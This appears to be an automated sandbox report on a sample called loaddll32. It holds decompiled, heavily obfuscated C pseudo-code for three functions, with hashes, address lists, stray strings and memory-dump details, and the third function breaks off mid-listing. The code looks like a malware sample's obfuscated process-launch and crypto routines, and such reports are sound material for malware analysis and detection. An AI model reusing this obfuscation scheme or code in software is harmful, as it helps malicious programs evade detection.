API ID:
String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: 47741287dd56dc120027e00558c28e574728a0ad0f7df50f9555d4b02047d569
Instruction ID: 9a356ecb973f7393436c84bd9aaa2b1e8c169087fd921a3e398997414a21578b
Opcode Fuzzy Hash: 47741287dd56dc120027e00558c28e574728a0ad0f7df50f9555d4b02047d569
Instruction Fuzzy Hash: 3C0241715083809FD3A8DF65C58AA5BBBE2FBC4758F10890DF6DA86260D7B48949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 008846BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E008846BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E0086C5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x886224; // 0x0
								_t343 = E008811B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x886224; // 0x0
									_t348 = E008811B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E00882B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x008846c6
0x008846cd
0x008846d0
0x008846d1
0x008846d8
0x008846df
0x008846e6
0x008846e7
0x008846e8
0x008846ed
0x008846f8
0x008846fa
0x00884705
0x00884708
0x00884711
0x00884719
0x0088471e
0x00884723
0x0088472b
0x00884733
0x0088473b
0x0088474a
0x0088474b
0x0088474f
0x00884754
0x0088475c
0x00884767
0x0088476f
0x0088477a
0x00884782
0x00884787
0x0088478f
0x00884797
0x0088479f
0x008847a3
0x008847ab
0x008847b8
0x008847bc
0x008847c1
0x008847c9
0x008847d4
0x008847df
0x008847ea
0x008847f2
0x008847fa
0x008847ff
0x00884807
0x0088480f
0x0088481a
0x00884825
0x00884830
0x0088483e
0x00884842
0x0088484a
0x0088484f
0x00884857
0x00884864
0x00884868
0x0088486d
0x00884875
0x0088487d
0x00884885
0x0088488a
0x0088488f
0x00884894
0x0088489c
0x008848a9
0x008848ad
0x008848b5
0x008848c6
0x008848c9
0x008848cd
0x008848d5
0x008848dd
0x008848e5
0x008848ed
0x008848f2
0x008848fa
0x00884902
0x0088490a
0x00884912
0x0088491a
0x0088491f
0x00884927
0x0088492f
0x0088493c
0x00884940
0x00884948
0x00884950
0x0088495b
0x00884966
0x00884971
0x0088497c
0x00884987
0x00884992
0x0088499a
0x008849aa
0x008849ae
0x008849b6
0x008849be
0x008849c7
0x008849cc
0x008849d2
0x008849da
0x008849e2
0x008849ea
0x008849f2
0x008849fa
0x00884a02
0x00884a0e
0x00884a11
0x00884a15
0x00884a1d
0x00884a25
0x00884a2d
0x00884a35
0x00884a3d
0x00884a45
0x00884a4d
0x00884a52
0x00884a5a
0x00884a62
0x00884a6a
0x00884a72
0x00884a76
0x00884a7a
0x00884a82
0x00884a8d
0x00884a98
0x00884aa3
0x00884ab6
0x00884abd
0x00884ac8
0x00884ad0
0x00884ad8
0x00884ae0
0x00884aed
0x00884af5
0x00884afd
0x00884b05
0x00884b0d
0x00884b15
0x00884b1d
0x00884b25
0x00884b2a
0x00884b32
0x00884b3a
0x00884b3f
0x00884b47
0x00884b4f
0x00884b57
0x00884b5f
0x00884b64
0x00884b6c
0x00884b74
0x00884b7c
0x00884b84
0x00884b89
0x00884b8e
0x00884b92
0x00884b9a
0x00884b9a
0x00884ba8
0x00884cdd
0x00884cde
0x00884ce6
0x00884ceb
0x00884cee
0x00884cf7
0x00884cf9
0x00000000
0x00884cf9
0x00884bae
0x00884bb4
0x00884c4e
0x00884caf
0x00884cb4
0x00884cbe
0x00884d39
0x00884d3b
0x00884d43
0x00884cc0
0x00884cc0
0x00000000
0x00884cc0
0x00884bba
0x00884bc0
0x00884bd9
0x00884c2e
0x00884c33
0x00884c3a
0x00884c40
0x00000000
0x00884c40
0x00884bc2
0x00884bc8
0x00000000
0x00884bce
0x00884bce
0x00000000
0x00884bce
0x00884bc8
0x00884bc0
0x00884bb4
0x00884d46
0x00884d52
0x00884d52
0x00884d16
0x00884d1d
0x00884d22
0x00884d22
0x00000000

Strings

F, xrefs: 00884807
<[, xrefs: 00884B6C
?K~, xrefs: 00884B57
.618, xrefs: 00884B4F
Nq, xrefs: 0088495B
d>, xrefs: 008849F2
8 8F, xrefs: 00884AE0
r20T, xrefs: 00884A72

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: 84190cb521c61964e6e51666547040565e504978bee7f18573f6f38421bc783b
Instruction ID: 155ae0f04a6695d06a175263a10d08768a2194cba92221ba0bee29b94074d75c
Opcode Fuzzy Hash: 84190cb521c61964e6e51666547040565e504978bee7f18573f6f38421bc783b
Instruction Fuzzy Hash: 67F1FF72009380DFD765CF61C94AA4BFBE1FB85758F104A1DE2DA86260D7B58948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0087017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0087017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E0087FE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E00874178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E0087FE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E0087E1F8(0x861224, _v92, _t344);
									_t335 = E0086473D(_a20, _v176, _v168, 0x861224, 0x861224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x861224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E0087FECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E00877952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x00870185
0x0087018e
0x00870190
0x00870197
0x0087019e
0x008701a5
0x008701ac
0x008701b3
0x008701b4
0x008701bb
0x008701bc
0x008701bd
0x008701c2
0x008701c9
0x008701cc
0x008701d3
0x008701d5
0x008701e2
0x008701ed
0x008701f2
0x00870200
0x00870205
0x0087020b
0x00870213
0x0087021b
0x00870220
0x00870221
0x00870225
0x0087022d
0x00870235
0x0087023d
0x00870245
0x0087024d
0x0087025a
0x0087025e
0x00870266
0x0087026e
0x00870276
0x0087027e
0x00870286
0x0087028e
0x00870293
0x0087029b
0x008702a3
0x008702a8
0x008702ad
0x008702b5
0x008702bd
0x008702c5
0x008702cd
0x008702d5
0x008702dd
0x008702e5
0x008702f2
0x008702f6
0x008702fe
0x0087030c
0x00870310
0x00870318
0x00870325
0x00870329
0x00870331
0x0087033e
0x0087034a
0x0087034f
0x00870355
0x0087035d
0x00870365
0x0087036d
0x00870375
0x0087037d
0x00870385
0x0087038d
0x0087039a
0x0087039d
0x008703a1
0x008703ae
0x008703b2
0x008703ba
0x008703c2
0x008703ca
0x008703d2
0x008703d7
0x008703df
0x008703ec
0x008703f0
0x008703f8
0x00870400
0x00870405
0x0087040d
0x00870415
0x00870422
0x00870426
0x0087042e
0x00870436
0x00870442
0x00870445
0x00870449
0x00870451
0x00870459
0x00870461
0x00870469
0x00870471
0x00870479
0x00870481
0x00870486
0x0087048e
0x00870496
0x0087049e
0x008704a6
0x008704ae
0x008704b6
0x008704be
0x008704c6
0x008704cb
0x008704d3
0x008704db
0x008704e3
0x008704eb
0x008704f3
0x008704fb
0x00870503
0x00870507
0x0087050f
0x00870517
0x00870524
0x00870528
0x00870530
0x00870535
0x0087053d
0x0087054a
0x00870557
0x00870560
0x00870564
0x0087056c
0x00870574
0x0087057c
0x00870584
0x0087058c
0x00870594
0x00870594
0x008705a6
0x008706c4
0x00000000
0x008705ac
0x008705ae
0x0087069a
0x008706ad
0x008706b1
0x008706b6
0x008706b9
0x008706bb
0x008706bd
0x00000000
0x008706bd
0x008705b4
0x008705b4
0x008705b6
0x00000000
0x008705bc
0x008705ce
0x008705d3
0x008705dc
0x008705e7
0x008705eb
0x008705fe
0x0087066c
0x00870684
0x00870689
0x0087068c
0x00000000
0x0087068c
0x008705b6
0x008705ae
0x00000000
0x008705a6
0x008706cf
0x008706da
0x008706e0
0x008706e5
0x008706e5
0x008706e5
0x008706f2
0x008706fd

Strings

{I, xrefs: 0087069A, 008706A8
-, xrefs: 00870276
ch, xrefs: 008704BE
D41, xrefs: 00870469
7+, xrefs: 0087021B
iD, xrefs: 0087057C
D, xrefs: 008705DC
A|6, xrefs: 008706AD

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: 4e131aa65f8cbbd9516772d027c39add22a8681011dd2710f4d09371b85ee712
Instruction ID: a0956afc03edff19f2b7699a041193796a870bdb2f3828d01790d9392c02310a
Opcode Fuzzy Hash: 4e131aa65f8cbbd9516772d027c39add22a8681011dd2710f4d09371b85ee712
Instruction Fuzzy Hash: B3D1FFB25083819FD368CF65C889A1BFBE1FBD5358F508A1DF69996260D3B58948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 008727F9, Relevance: 10.2, Strings: 8, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E008727F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E0087DC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E008709DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E0086856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
